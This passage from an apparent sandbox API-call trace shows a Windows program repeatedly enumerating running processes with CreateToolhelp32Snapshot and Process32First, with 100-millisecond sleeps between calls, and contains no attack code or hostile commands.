th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.984] Sleep (dwMilliseconds=0x64) [0155.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.016] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.112] Sleep (dwMilliseconds=0x64) [0156.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.132] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.227] Sleep (dwMilliseconds=0x64) [0156.233] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.250] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.342] Sleep (dwMilliseconds=0x64) [0156.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.369] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.474] Sleep (dwMilliseconds=0x64) [0156.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.493] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.601] Sleep (dwMilliseconds=0x64) [0156.615] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.626] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.702] Sleep (dwMilliseconds=0x64) [0156.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.776] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.851] Sleep (dwMilliseconds=0x64) [0156.855] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0156.865] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.062] Sleep (dwMilliseconds=0x64) [0157.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.115] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.260] Sleep (dwMilliseconds=0x64) [0157.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.289] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.361] Sleep (dwMilliseconds=0x64) [0157.370] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.383] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.457] Sleep (dwMilliseconds=0x64) [0157.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.476] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.556] Sleep (dwMilliseconds=0x64) [0157.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.586] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.674] Sleep (dwMilliseconds=0x64) [0157.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.703] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.781] Sleep (dwMilliseconds=0x64) [0157.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.805] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.906] Sleep (dwMilliseconds=0x64) [0157.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0157.936] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.037] Sleep (dwMilliseconds=0x64) [0158.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.054] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.188] Sleep (dwMilliseconds=0x64) [0158.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.212] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.285] Sleep (dwMilliseconds=0x64) [0158.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.303] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.381] Sleep (dwMilliseconds=0x64) [0158.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.397] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.467] Sleep (dwMilliseconds=0x64) [0158.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.501] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.572] Sleep (dwMilliseconds=0x64) [0158.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.630] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.719] Sleep (dwMilliseconds=0x64) [0158.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.741] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.813] Sleep (dwMilliseconds=0x64) [0158.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0158.923] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.158] Sleep (dwMilliseconds=0x64) [0159.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0159.230] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.019] Sleep (dwMilliseconds=0x64) [0160.183] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0160.203] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.520] Sleep (dwMilliseconds=0x64) [0160.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0160.932] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.235] Sleep (dwMilliseconds=0x64) [0163.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11b8 [0163.833] Process32First (in: hSnapshot=0x11b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.313] Sleep (dwMilliseconds=0x64) [0164.350] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11b8 [0164.365] Process32First (in: hSnapshot=0x11b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.453] Sleep (dwMilliseconds=0x64) [0164.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11b8 [0164.940] Process32First (in: hSnapshot=0x11b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.155] Sleep (dwMilliseconds=0x64) [0165.204] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11b8 [0165.772] Process32First (in: hSnapshot=0x11b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.891] Sleep (dwMilliseconds=0x64) [0166.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11b8 [0166.337] Process32First (in: hSnapshot=0x11b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.881] Sleep (dwMilliseconds=0x64) [0167.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11b8 [0167.272] Process32First (in: hSnapshot=0x11b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.761] Sleep (dwMilliseconds=0x64) [0168.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c7c [0168.409] Process32First (in: hSnapshot=0x1c7c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.115] Sleep (dwMilliseconds=0x64) [0169.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c7c [0169.968] Process32First (in: hSnapshot=0x1c7c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.259] Sleep (dwMilliseconds=0x64) [0170.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0170.350] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.487] Sleep (dwMilliseconds=0x64) [0170.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0170.518] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.646] Sleep (dwMilliseconds=0x64) [0170.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0170.948] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.164] Sleep (dwMilliseconds=0x64) [0171.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0171.338] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.541] Sleep (dwMilliseconds=0x64) [0171.568] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0171.578] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.661] Sleep (dwMilliseconds=0x64) [0171.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0171.704] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.772] Sleep (dwMilliseconds=0x64) [0171.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0171.797] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.890] Sleep (dwMilliseconds=0x64) [0171.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0171.916] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.033] Sleep (dwMilliseconds=0x64) [0172.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0172.100] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.276] Sleep (dwMilliseconds=0x64) [0172.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0172.352] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.586] Sleep (dwMilliseconds=0x64) [0172.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0172.633] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.709] Sleep (dwMilliseconds=0x64) [0172.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0172.727] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.805] Sleep (dwMilliseconds=0x64) [0172.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0172.819] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.895] Sleep (dwMilliseconds=0x64) [0172.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0172.914] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.013] Sleep (dwMilliseconds=0x64) [0173.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.041] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.131] Sleep (dwMilliseconds=0x64) [0173.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.148] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.266] Sleep (dwMilliseconds=0x64) [0173.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.298] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.377] Sleep (dwMilliseconds=0x64) [0173.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.399] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.489] Sleep (dwMilliseconds=0x64) [0173.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.510] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.660] Sleep (dwMilliseconds=0x64) [0173.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.693] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.791] Sleep (dwMilliseconds=0x64) [0173.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.833] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.945] Sleep (dwMilliseconds=0x64) [0173.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0173.958] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.055] Sleep (dwMilliseconds=0x64) [0174.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0174.090] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.196] Sleep (dwMilliseconds=0x64) [0174.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0174.232] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.390] Sleep (dwMilliseconds=0x64) [0174.435] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0174.445] 